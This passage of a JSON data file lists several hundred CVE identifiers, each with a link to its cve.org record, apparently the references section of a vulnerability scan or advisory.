"url": "https://www.cve.org/CVERecord?id=CVE-2024-56584"
},
{
"name": "CVE-2026-23235",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23235"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2022-4899",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4899"
},
{
"name": "CVE-2025-71152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71152"
},
{
"name": "CVE-2024-42139",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42139"
},
{
"name": "CVE-2024-56692",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56692"
},
{
"name": "CVE-2024-53196",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53196"
},
{
"name": "CVE-2025-38665",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38665"
},
{
"name": "CVE-2022-50212",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50212"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2023-54259",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54259"
},
{
"name": "CVE-2025-68802",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68802"
},
{
"name": "CVE-2023-54067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54067"
},
{
"name": "CVE-2025-1369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1369"
},
{
"name": "CVE-2022-3219",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3219"
},
{
"name": "CVE-2025-68317",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68317"
},
{
"name": "CVE-2023-53231",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53231"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2022-2961",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-2961"
},
{
"name": "CVE-2025-40331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40331"
},
{
"name": "CVE-2025-4673",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-4673"
},
{
"name": "CVE-2022-49635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49635"
},
{
"name": "CVE-2024-50017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50017"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2024-53241",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53241"
},
{
"name": "CVE-2025-14180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14180"
},
{
"name": "CVE-2026-23949",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23949"
},
{
"name": "CVE-2025-38704",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38704"
},
{
"name": "CVE-2023-34969",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34969"
},
{
"name": "CVE-2021-33155",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33155"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2024-57899",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57899"
},
{
"name": "CVE-2024-49928",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49928"
},
{
"name": "CVE-2025-21885",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21885"
},
{
"name": "CVE-2024-50187",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50187"
},
{
"name": "CVE-2022-50851",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50851"
},
{
"name": "CVE-2025-36001",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36001"
},
{
"name": "CVE-2022-50464",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50464"
},
{
"name": "CVE-2025-38674",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38674"
},
{
"name": "CVE-2025-40093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40093"
},
{
"name": "CVE-2020-26560",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26560"
},
{
"name": "CVE-2024-26714",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26714"
},
{
"name": "CVE-2024-45777",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45777"
},
{
"name": "CVE-2025-38040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38040"
},
{
"name": "CVE-2024-40954",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40954"
},
{
"name": "CVE-2022-49965",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49965"
},
{
"name": "CVE-2025-54771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-54771"
},
{
"name": "CVE-2024-0564",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0564"
},
{
"name": "CVE-2025-39825",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39825"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2022-49961",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49961"
},
{
"name": "CVE-2025-69651",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69651"
},
{
"name": "CVE-2025-38552",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38552"
},
{
"name": "CVE-2025-40335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40335"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2024-58098",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58098"
},
{
"name": "CVE-2025-22871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22871"
},
{
"name": "CVE-2022-28667",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28667"
},
{
"name": "CVE-2023-53383",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53383"
},
{
"name": "CVE-2024-46717",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46717"
},
{
"name": "CVE-2024-25743",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25743"
},
{
"name": "CVE-2022-50704",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50704"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2023-54125",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54125"
},
{
"name": "CVE-2025-10911",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-10911"
},
{
"name": "CVE-2026-23164",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23164"
},
{
"name": "CVE-2024-41036",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41036"
},
{
"name": "CVE-2023-53751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53751"
},
{
"name": "CVE-2025-0033",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0033"
},
{
"name": "CVE-2023-53743",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53743"
},
{
"name": "CVE-2024-42319",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42319"
},
{
"name": "CVE-2025-37928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37928"
},
{
"name": "CVE-2017-13716",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-13716"
},
{
"name": "CVE-2024-22018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22018"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2022-40735",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40735"
},
{
"name": "CVE-2024-36024",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36024"
},
{
"name": "CVE-2025-21723",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21723"
},
{
"name": "CVE-2023-54190",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54190"
},
{
"name": "CVE-2023-52879",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52879"
},
{
"name": "CVE-2025-68281",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68281"
},
{
"name": "CVE-2023-52837",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52837"
},
{
"name": "CVE-2025-38440",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38440"
},
{
"name": "CVE-2026-23124",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23124"
},
{
"name": "CVE-2023-52981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52981"
},
{
"name": "CVE-2024-53224",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53224"
},
{
"name": "CVE-2024-49910",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49910"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2023-53105",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53105"
},
{
"name": "CVE-2025-68236",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68236"
},
{
"name": "CVE-2024-39286",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39286"
},
{
"name": "CVE-2025-25184",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25184"
},
{
"name": "CVE-2025-14524",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14524"
},
{
"name": "CVE-2024-49855",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49855"
},
{
"name": "CVE-2024-47081",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47081"
},
{
"name": "CVE-2025-68333",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68333"
},
{
"name": "CVE-2024-47689",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47689"
},
{
"name": "CVE-2025-71160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71160"
},
{
"name": "CVE-2025-71232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71232"
},
{
"name": "CVE-2023-52625",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52625"
},
{
"name": "CVE-2023-53353",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53353"
},
{
"name": "CVE-2024-58096",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58096"
},
{
"name": "CVE-2025-38225",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38225"
},
{
"name": "CVE-2023-53401",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53401"
},
{
"name": "CVE-2025-22037",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22037"
},
{
"name": "CVE-2023-53702",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53702"
},
{
"name": "CVE-2025-68290",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68290"
},
{
"name": "CVE-2025-40280",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40280"
},
{
"name": "CVE-2024-26842",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26842"
},
{
"name": "CVE-2025-40099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40099"
},
{
"name": "CVE-2023-54059",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54059"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2021-0170",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0170"
},
{
"name": "CVE-2019-10782",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10782"
},
{
"name": "CVE-2024-40966",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40966"
},
{
"name": "CVE-2024-53133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53133"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2022-50571",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50571"
},
{
"name": "CVE-2021-31879",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31879"
},
{
"name": "CVE-2026-23120",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23120"
},
{
"name": "CVE-2025-40180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40180"
},
{
"name": "CVE-2022-49393",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49393"
},
{
"name": "CVE-2024-6119",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6119"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-22996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22996"
},
{
"name": "CVE-2024-53091",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53091"
},
{
"name": "CVE-2025-39851",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39851"
},
{
"name": "CVE-2025-71204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71204"
},
{
"name": "CVE-2025-68331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68331"
},
{
"name": "CVE-2025-38244",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38244"
},
{
"name": "CVE-2022-29217",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29217"
},
{
"name": "CVE-2024-26758",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26758"
},
{
"name": "CVE-2025-38080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38080"
},
{
"name": "CVE-2023-32651",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32651"
},
{
"name": "CVE-2025-37747",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37747"
},
{
"name": "CVE-2026-2297",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2297"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2023-53036",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53036"
},
{
"name": "CVE-2025-38615",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38615"
},
{
"name": "CVE-2025-58181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58181"
},
{
"name": "CVE-2025-71115",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71115"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2022-50862",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50862"
},
{
"name": "CVE-2025-1118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1118"
},
{
"name": "CVE-2024-50166",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50166"
},
{
"name": "CVE-2024-35862",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35862"
},
{
"name": "CVE-2023-53355",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53355"
},
{
"name": "CVE-2022-25265",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25265"
},
{
"name": "CVE-2026-0967",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0967"
},
{
"name": "CVE-2026-23181",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23181"
},
{
"name": "CVE-2025-37944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37944"
},
{
"name": "CVE-2023-53558",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53558"
},
{
"name": "CVE-2025-47914",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47914"
},
{
"name": "CVE-2025-68214",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68214"
},
{
"name": "CVE-2025-38703",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38703"
},
{
"name": "CVE-2026-23141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23141"
},
{
"name": "CVE-2026-22860",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22860"
},
{
"name": "CVE-2025-36365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36365"
},
{
"name": "CVE-2025-9403",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9403"
},
{
"name": "CVE-2025-40247",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40247"
},
{
"name": "CVE-2023-1255",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1255"
},
{
"name": "CVE-2024-56641",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56641"
},
{
"name": "CVE-2024-43842",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43842"
},
{
"name": "CVE-2025-0686",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0686"
},
{
"name": "CVE-2025-21739",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21739"
},
{
"name": "CVE-2024-49992",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49992"
},
{
"name": "CVE-2025-68781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68781"
},
{
"name": "CVE-2025-39753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39753"
},
{
"name": "CVE-2025-69418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69418"
},
{
"name": "CVE-2026-23182",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23182"
},
{
"name": "CVE-2021-0173",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0173"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2024-45778",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45778"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2024-47661",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47661"
},
{
"name": "CVE-2026-28418",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28418"
},
{
"name": "CVE-2023-54151",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54151"
},
{
"name": "CVE-2025-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22022"
},
{
"name": "CVE-2025-66864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66864"
},
{
"name": "CVE-2024-46803",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46803"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-59466",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59466"
},
{
"name": "CVE-2025-40192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40192"
},
{
"name": "CVE-2025-38544",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38544"
},
{
"name": "CVE-2025-39797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39797"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2022-36351",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36351"
},
{
"name": "CVE-2023-52921",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52921"
},
{
"name": "CVE-2025-15468",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15468"
},
{
"name": "CVE-2024-36478",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36478"
},
{
"name": "CVE-2024-43832",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43832"
},
{
"name": "CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"name": "CVE-2026-1299",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1299"
},
{
"name": "CVE-2024-54683",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54683"
},
{
"name": "CVE-2025-1150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1150"
},
{
"name": "CVE-2024-46720",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46720"
},
{
"name": "CVE-2024-26658",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26658"
},
{
"name": "CVE-2026-2243",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2243"
},
{
"name": "CVE-2025-38198",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38198"
},
{
"name": "CVE-2025-58189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58189"
},
{
"name": "CVE-2022-36087",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36087"
},
{
"name": "CVE-2024-38564",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38564"
},
{
"name": "CVE-2021-0174",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0174"
},
{
"name": "CVE-2025-8746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8746"
},
{
"name": "CVE-2025-36442",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36442"
},
{
"name": "CVE-2025-38006",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38006"
},
{
"name": "CVE-2025-40102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40102"
},
{
"name": "CVE-2026-0968",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0968"
},
{
"name": "CVE-2025-40170",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40170"
},
{
"name": "CVE-2025-38437",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38437"
},
{
"name": "CVE-2025-40160",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40160"
},
{
"name": "CVE-2023-7008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7008"
},
{
"name": "CVE-2024-45779",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45779"
},
{
"name": "CVE-2025-40284",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40284"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2025-40077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40077"
},
{
"name": "CVE-2024-57857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57857"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2022-50213",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50213"
},
{
"name": "CVE-2024-46823",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46823"
},
{
"name": "CVE-2023-32642",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32642"
},
{
"name": "CVE-2025-71227",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71227"
},
{
"name": "CVE-2025-61772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61772"
},
{
"name": "CVE-2024-46733",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46733"
},
{
"name": "CVE-2024-41014",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41014"
},
{
"name": "CVE-2022-50015",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50015"
},
{
"name": "CVE-2025-40071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40071"
},
{
"name": "CVE-2024-7883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7883"
},
{
"name": "CVE-2024-50271",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50271"
},
{
"name": "CVE-2022-50772",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50772"
},
{
"name": "CVE-2024-56717",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56717"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2024-56707",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56707"
},
{
"name": "CVE-2023-54234",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54234"
},
{
"name": "CVE-2022-45885",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45885"
},
{
"name": "CVE-2022-49783",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49783"
},
{
"name": "CVE-2025-40305",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40305"
},
{
"name": "CVE-2016-2781",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-2781"
},
{
"name": "CVE-2023-29383",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29383"
},
{
"name": "CVE-2025-47153",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47153"
},
{
"name": "CVE-2025-40080",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40080"
},
{
"name": "CVE-2024-53216",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53216"
},
{
"name": "CVE-2022-49539",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49539"
},
{
"name": "CVE-2024-36347",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36347"
},
{
"name": "CVE-2024-26869",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26869"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2021-20255",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-20255"
},
{
"name": "CVE-2022-48979",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48979"
},
{
"name": "CVE-2025-40307",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40307"
},
{
"name": "CVE-2025-71193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71193"
},
{
"name": "CVE-2023-54180",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54180"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2024-46848",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46848"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-38081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38081"
},
{
"name": "CVE-2024-36009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36009"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2024-36350",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36350"
},
{
"name": "CVE-2023-25951",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25951"
},
{
"name": "CVE-2025-40211",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40211"
},
{
"name": "CVE-2023-53152",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53152"
},
{
"name": "CVE-2021-0308",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0308"
},
{
"name": "CVE-2025-68315",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68315"
},
{
"name": "CVE-2024-50009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50009"
},
{
"name": "CVE-2025-39850",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39850"
},
{
"name": "CVE-2022-1205",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1205"
},
{
"name": "CVE-2023-45927",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45927"
},
{
"name": "CVE-2020-25742",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25742"
},
{
"name": "CVE-2022-0987",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0987"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-40217",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40217"
},
{
"name": "CVE-2025-38199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38199"
},
{
"name": "CVE-2025-39905",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39905"
},
{
"name": "CVE-2025-21944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21944"
},
{
"name": "CVE-2022-50720",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50720"
},
{
"name": "CVE-2025-71105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71105"
},
{
"name": "CVE-2023-50387",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50387"
},
{
"name": "CVE-2022-49529",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49529"
},
{
"name": "CVE-2025-68266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68266"
},
{
"name": "CVE-2024-27057",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27057"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-39961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39961"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2024-54456",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-54456"
},
{
"name": "CVE-2024-26876",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26876"
},
{
"name": "CVE-2025-40248",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40248"
},
{
"name": "CVE-2023-52657",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52657"
},
{
"name": "CVE-2025-37876",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37876"
},
{
"name": "CVE-2024-58089",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58089"
},
{
"name": "CVE-2024-36331",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36331"
},
{
"name": "CVE-2026-27571",
